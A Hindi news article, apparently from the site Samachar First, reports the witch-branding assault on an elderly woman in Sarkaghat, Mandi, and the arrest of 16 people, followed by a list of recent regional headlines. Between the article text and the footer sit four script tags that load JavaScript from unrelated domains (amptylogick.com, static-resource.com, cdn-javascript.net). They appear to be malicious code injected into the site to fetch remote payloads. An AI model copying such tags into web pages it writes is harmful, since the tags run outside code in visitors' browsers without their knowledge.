मंडीः वृद्धा से क्रूरता मामले में पुलिस ने 20 पर दर्ज़ की FIR, 16 को किया गिरफ्तार

<p>मंडी में देवता के नाम पर महिला के साथ बदसलूकी के बाद बुजुर्ग महिला सहित सारा परिवार सदमे में आ गया है। पुलिस ने 20 लोगों पर एफआईआर दर्ज़ की है। मुंह पर कालिख पोतकर वृद्धा को गांव में घुमाने के मामले में वीडियो वायरल होने के बाद पुलिस हरकत में आई है। पुलिस ने मुकदमा दर्ज कर 16 लोगों को गिरफ्तार किया है। इसमें 12 पुरुष और पांच महिलाएं शामिल हैं। बताया जा रहा है कि सरकाघाट थाना में देवता का रथ लेकर 300 से अधिक कार-कारिंदे पहुंच रहे हैं। हंगामे के आसार को देखते हुए मंडी से पुलिस के बड़े अधिकारी सरकाघाट पहुंच गए हैं।&nbsp; वृद्धा से क्रूरता के मामले में पीड़िता की बेटी हमीरपुर में मीडिया के सामने फूट-फूट कर रोई। पीड़िता की बेटी का कहना है कि वह उस गांव में कभी नहीं जाएंगे। उन्हें आरोपियों और उनके रिश्तेदारों की तरफ से कत्ल करने की धमकियां मिल रही हैं। पीड़िता राजदेई की बेटी तृप्ता ने मुख्यमंत्री जयराम ठाकुर से एक बार फिर इस मामले में मदद मांगी है।</p>

<p>बता दें कि मंडी के सरकाघाट में शर्मनाक घटना सामने आई है। जहां कुछ लोगों ने एक बुजुर्ग महिला को डायन बताकर पीटा, मुंह काला किया, जूतों की माला पहनाई और घर को जलाने की कोशिश की थी। बुजुर्ग महिला पर धर्म के कुछ तथाकथित ठेकेदारों का आरोप है कि महिला ने गांव के लोगों पर कोई देवता लगाया है, जिससे गांव में अनिष्ट हो रहा है। देवता के नाम पर इनका घर जलाने का प्रयास किया गया। घर में रखे सामान को जला दिया गया। जब इन लोगों का दिल नहीं भरा तो एक 70 वर्षीय बुजुर्ग महिला का मुहं काला कर जूते की माला पहनाई और सरेआम घसीटा गया।</p>

<p>इस सारी घटना का वीडियो सोशल मीडिया पर खूब वायरल हो रहा है। वीडियो में साफ दिख रहा है कि गांव के लोग किस तरह से बुजुर्ग महिला के साथ जानवरों से भी बदतर व्यवहार कर रहे हैं। वहीं, बुजुर्ग महिला के परिजन जब शिकायत लेकर पुलिस के पास पहुंचे तो दूसरे पक्ष ने शिकायत पत्र फाड़ दिया।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1573371353229″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

मतदाताओं को मतदान का संदेश देने के लिए साइकलिंग एक्सपीडिशन स्पीति पहुंची

दुनिया के सबसे ऊंचे पोलिंग बूथ टशीगंग से साइकिल सवार देश के मतदाताओं को मतदान…

18 mins ago

राजनीतिक मंडी में बिके हमीरपुर जिला के तीन विधायक खनन व भू-माफिया: CM

राजनीतिक मंडी में बिके हमीरपुर जिला के तीन विधायक खनन व भू- माफिया : मुख्यमंत्री…

22 mins ago

बैजनाथ सहित अन्य विधानसभा क्षेत्र में सहायक मतदान केन्द्र होंगे स्थापित

विधानसभा क्षेत्र 20-बैजनाथ (अ.जा.) के 99-बड़ाभंगाल और 54-कसौली (अ.जा.) के 27-ढिल़्लों में सहायक मतदान केन्द्र…

26 mins ago

हिमाचल की चारों सीटों पर प्रचंड बहुमत से कमल खिलेगा: BJP

भारतीय जनता पार्टी के राष्ट्रीय अध्यक्ष जगत प्रकाश नड्डा द्वारा हिमाचल प्रदेश के नूरपुर, चंबा…

31 mins ago

डीसी ने मुल्थान में प्रभावित क्षेत्र का लिया जायजा, प्रबंधन को दिए निर्देश

उपायुक्त हेमराज बैरवा ने शनिवार को मुल्थान में पन बिजली परियोजना से प्रभावित क्षेत्र का…

39 mins ago

दस साल से रेलवे लाइन का राग ही अलाप रहे अनुराग, मंजूरी तक नहीं दिला पाए : मुख्यमंत्री

नादौन: मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू ने नादौन में पत्रकारों के साथ बातचीत में कहा…

16 hours ago